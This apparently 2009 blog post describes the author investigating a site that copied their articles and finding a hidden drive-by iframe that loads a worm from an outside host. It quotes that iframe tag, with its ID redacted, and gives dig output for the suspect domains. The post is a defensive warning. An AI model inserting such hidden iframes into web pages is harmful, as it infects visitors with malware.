Geekamongus - A Tech Blog for You

! WARNING ! – DO NOT VISIT THE SITES BELOW – ! WARNING !

I noticed some Pakistan site had pingbacks for some articles we wrote, but no comments from the person that copy and pasted them (verbatim) on their site.

Well, being the person that I am, I fired up “Wireshark” on my Linux box (of course) to investigate their site further.

I noticed they had various other sites tied to the same domain, so I visited another one (other than the blog) and low and behold something was a little fishy.

Their “photo” site tried to launch a little gift for me……an “IFrame exploit” and if you’re running Windows you get a special prize for the visit…..a worm.  ;0)

While watching wireshark, I noticed the iframe fire off to get our little prize, then a DNS request to reach out and grab it etc.

SharkIT! ————————-
Example: ( I removed the numbers…but don’t mess around!)
<iframe src=”http://asfirey.net/?click=xxxxxxx” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
————————————–

Now I’m not saying this is some evil plan from these guys, as this very same issue has been targeting thousands of legit sites and attempting/succesfully inserting
the very same type of “IFrame Exploits” via SQL injections and XSS.

DIG’m Up! ———————————-

; <<>> DiG 9.6.1-P1-RedHat-9.6.1-4.P1.fc11 <<>> @ns1.hostmonster.com photo.csatpk.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28277
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;photo.csatpk.com.        IN    A

;; ANSWER SECTION:
photo.csatpk.com.    14400    IN    A    74.220.207.85

;; AUTHORITY SECTION:
csatpk.com.        86400    IN    NS    ns1.hostmonster.com.
csatpk.com.        86400    IN    NS    ns2.hostmonster.com.

;; ADDITIONAL SECTION:
ns1.hostmonster.com.    14400    IN    A    74.220.195.131
ns2.hostmonster.com.    14400    IN    A    69.89.16.8

;; Query time: 234 msec
;; SERVER: 74.220.195.131#53(74.220.195.131)
;; WHEN: Thu Aug 27 20:54:24 2009
;; MSG SIZE  rcvd: 130

dig @ns1.hostmonster.com blog.csatpk.com

; <<>> DiG 9.6.1-P1-RedHat-9.6.1-4.P1.fc11 <<>> @ns1.hostmonster.com blog.csatpk.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55817
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;blog.csatpk.com.        IN    A

;; ANSWER SECTION:
blog.csatpk.com.    14400    IN    A    74.220.207.85

;; AUTHORITY SECTION:
csatpk.com.        86400    IN    NS    ns1.hostmonster.com.
csatpk.com.        86400    IN    NS    ns2.hostmonster.com.

;; ADDITIONAL SECTION:
ns1.hostmonster.com.    14400    IN    A    74.220.195.131
ns2.hostmonster.com.    14400    IN    A    69.89.16.8

;; Query time: 250 msec
;; SERVER: 74.220.195.131#53(74.220.195.131)
;; WHEN: Thu Aug 27 20:54:31 2009
;; MSG SIZE  rcvd: 129

—————————————–

It seems that very same IP hosts almost 1400 other domains, a lot of them are crazy hostnames that you might see with botnets etc.

Hmmmmm……kinda weird for all those to be out in “Utah”. Yeah, I know anyone can host anywhere and hostmonster is big, but it’s still odd though.

I’ll probably write both the domain admin and hostmonster tomorrow, in case they are just another victim of a drive by injection, but I’m tired. ;0)

NOTE: Unrelated to this instance, but always keep in mind, even if you update your OS, Antivirus, Anti-Malware, Acrobat, Quicktime, Flash, and all other software on a regular basis,
it’s always possible to get hit by something fresh off the minds of the bad guys.

Once again…….install Linux, FreeBSD, or even OSX and go ride your bike.

HTH